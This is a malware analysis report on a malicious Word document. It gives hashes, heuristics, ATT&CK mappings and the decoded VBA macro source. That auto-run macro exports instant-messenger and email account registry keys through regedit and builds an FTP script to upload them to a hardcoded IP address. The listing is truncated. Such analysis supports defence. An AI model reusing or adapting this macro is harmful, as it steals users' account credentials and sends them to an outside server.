Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f33a17a92f39e689…

MALICIOUS

Office (OLE)

47.0 KB Created: 1999-08-08 03:28:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: ccbf1dd76ca39706dcba7f5dd304b425 SHA-1: 3160e3933d1ce0b52d7deacc71feddb5b261cffb SHA-256: f33a17a92f39e689129e913193cffd181a73820ee626b45649e900dc182437f4
280 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a VBA macro that executes automatically when the document is opened. This macro attempts to export sensitive user information from the registry, including AOL Instant Messenger and Microsoft Internet Account Manager details, to temporary files. The presence of the 'Shell()' call and the auto-execution of the 'Document_Open' macro strongly indicate a malicious intent to exfiltrate user data.

Heuristics 5

  • ClamAV: Doc.Trojan.Thief-7 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Thief-7
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6567 bytes
SHA-256: 48cd9603c348108d1ec935ae7bd5c26217bd0134cbc288d373146ef74dcd238e
Detection
ClamAV: Doc.Trojan.Thief-7
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Open()
'HAHAHAHA If you have found this... Greetz out to alt.hackers.malicious
' all those guys who think they no everything about everyone jsut from a posting
'  Well, maybe this will teach them a thing or two
'  Love anonymous

Dim commandx As String
Dim commandy As String
Dim commandz As String

Dim mychar As String
Dim fnamez As String
Dim fnamezz As String
Dim info1 As String
Dim info2 As String
Dim info3 As String
Dim info4 As String
Dim info5 As String
Dim info6 As String
Dim info7 As String

info1 = Application.UserAddress
info2 = Application.UserName
info3 = Application.UserInitials




fnamez = Second(VBA.DateTime.Now)
'Application.UserAddress



mychar = Chr$(34)

 Dim var1(4) As String
     Dim var2(13) As String
     Dim var3(9) As String
     Dim var4(3) As String
     Dim var5(3) As String
     Dim var6(6) As String
     Dim var7(7) As String
     Dim var8(10) As String
     Dim var9(4) As String
     Dim var10(11) As String
     Dim carriage(2) As String
     Dim Location As Integer
     Dim errorp

commandx = "regedit /e c:\" & fnamez & "reg1.reg " & mychar & "HKEY_CURRENT_USER\Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users" & mychar



commandy = "regedit /e c:\" & fnamez & "reg2.reg " & mychar & "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info" & mychar

commandz = "regedit /e c:\" & fnamez & "reg3.reg " & mychar & "HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts" & mychar

fnamezz = "c:\" & fnamez & "reg4.reg"




Dim RetVal
RetVal = Shell(commandx, 0)    ' Run Calculator.
RetVal = Shell(commandy, 0)
RetVal = Shell(commandz, 0)
     
     carriage(1) = Chr$(13)
     carriage(2) = Chr$(10)
     Location = 0
     var1(1) = "o"
     var1(2) = "p"
     var1(3) = "e"
     var1(4) = "n"
     
     var2(1) = "1"
     var2(2) = "9"
     var2(3) = "5"
     var2(4) = "."
     var2(5) = "4"
     var2(6) = "7"
     var2(7) = "."
     var2(8) = "2"
     var2(9) = "1"
     var2(10) = "."
     var2(11) = "1"
     var2(12) = "3"
     var2(13) = "2"
     
     
     var3(1) = "a"
     var3(2) = "n"
     var3(3) = "o"
     var3(4) = "n"
     var3(5) = "y"
     var3(6) = "m"
     var3(7) = "o"
     var3(8) = "u"
     var3(9) = "s"
     
     var4(1) = "z"
     var4(2) = "@"
     var4(3) = "z"
     
     var5(1) = "a"
     var5(2) = "s"
     var5(3) = "c"
     
     var6(1) = "p"
     var6(2) = "r"
     var6(3) = "o"
     var6(4) = "m"
     var6(5) = "p"
     var6(6) = "t"
     
     var10(1) = "c"
     var10(2) = "d"
     var10(3) = " "
     var10(4) = "I"
     var10(5) = "n"
     var10(6) = "c"
     var10(7) = "o"
     var10(8) = "m"
     var10(9) = "i"
     var10(10) = "n"
     var10(11) = "g"
     
     var7(1) = "l"
     var7(2) = "c"
     var7(3) = "d"
     var7(4) = " "
     var7(5) = "c"
     var7(6) = ":"
     var7(7) = "\"
     
     
     var8(1) = "m"
     var8(2) = "p"
     var8(3) = "u"
     var8(4) = "t"
     var8(5) = " "
     var8(6) = "*"
     var8(7) = "."
     var8(8) = "r"
     var8(9) = "e"
     var8(10) = "g"
     
     var9(1) = "q"
     var9(2) = "u"
     var9(3) = "i"
     var9(4) = "t"
     
     Open fnamezz For Random As 5
     Put #5, 1, info1
     Put #5, 2, info2
     Put #5, 3, info3
     Close 5
     
     
     
     
     Open "c:\list4.txt" For Binary As 4
     
     For i = 1 To 4 'open
          Location = Location + 1
          Put #4, Location, var1(i)
     Next
     Location = Location + 1
     Put #4, Location, var7(4)
     
     For i = 1 To 13 'ipaddy
          Location = Location + 1
          Put #4, Location, var2(i)
     Next
     Location = Location + 1
  
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.